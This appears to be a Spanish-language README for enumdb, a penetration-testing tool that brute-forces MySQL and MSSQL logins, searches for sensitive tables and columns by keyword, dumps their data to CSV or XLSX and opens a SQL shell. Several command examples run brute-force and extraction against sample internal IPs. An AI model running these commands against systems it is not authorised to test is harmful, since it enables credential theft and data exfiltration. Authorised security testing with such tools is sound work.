
Herramienta de fuerza bruta y post-explotación para bases de datos relacionales MySQL y MSSQL
Enumdb es una herramienta de fuerza bruta y post-explotación para bases de datos relacionales MySQL y MSSQL. Cuando se proporciona una lista de nombres de usuario y/o contraseñas, recorre cada host buscando credenciales válidas. De forma predeterminada, enumdb utiliza las credenciales recién descubiertas para buscar automáticamente campos de datos sensibles mediante búsquedas de palabras clave en nombres de tablas o columnas. Esta información luego se puede extraer y reportar a un archivo de salida .csv o .xlsx.
Adiciones recientes:
-r csv o -r xlsx para la extracción de datos.-v).El número de filas extraídas, las bases de datos y tablas en lista negra, y las búsquedas de palabras clave se pueden modificar en: enumdb/config.py.
Enumdb fue diseñado y probado usando Python3 en sistemas Linux basados en Debian (Kali). Sin embargo, la herramienta también es compatible con Python2.7 y en otras distribuciones de Linux.
git clone https://github.com/m8r0wn/enumdb
cd enumdb
python3 setup.py install
Conectar a una base de datos MySQL y buscar palabras clave en nombres de tablas (sin informe)
enumdb -u root -p 'password123' -t mysql 10.11.1.30
Conectar a una base de datos MSSQL usando credenciales de dominio, buscar datos usando palabras clave en nombres de columnas y extraer a un informe .xlsx:
enumdb -u 'domain\\user' -p Winter2018! -t mssql -columns -report xlsx 10.11.1.30
Fuerza bruta en múltiples servidores MySQL buscando credenciales por defecto (sin enumeración de datos o tablas)
enumdb -u root -p '' -t mysql --brute 10.11.1.0-30
Fuerza bruta en inicio de sesión de cuenta sa de MSSQL. Una vez encontradas credenciales válidas, enumerar datos por nombre de tabla escribiendo la salida a un informe .csv:
enumdb -u sa -P passwords.txt -t mssql -columns -report xlsx 192.168.10.10
Generar un shell SQL en el sistema:
enumdb -u sa -P 'P@ssword1' -t mssql --shell 192.168.10.10
optional arguments:
-h, --help show this help message and exit
-T MAX_THREADS Max threads (Default: 10)
-v Verbose output
Connection:
-port PORT Specify non-standard port
-t {mysql,mssql} Database type
target Target database server(s) [Positional]
Authentication:
-u USERS Single username
-U USERS Users.txt file
-p PASSWORDS Single password
-P PASSWORDS Password.txt file
Enumeration:
-c, --columns Search for key words in column names (Default: table names)
-r {none,csv,xlsx} Extract data and create output report
Additional Actions:
--brute Brute force only (No DB Enumeration)
--shell Launch SQL Shell
enumdb#> help
...
edb_databases - list all databases
edb_tables [DB] - list tables in DB
edb_columns [table].[DB] - list columns in table
edb_dump [table].[DB] [#rows] - Get data from table
[SQL Query] - Execute raw SQL query
Si experimenta problemas con MySQLdb, es posible que se requieran recursos adicionales de desarrollo de MySQL:
sudo apt-get install python3-dev default-libmysqlclient-dev build-essential
sudo yum install python3-devel mysql-devel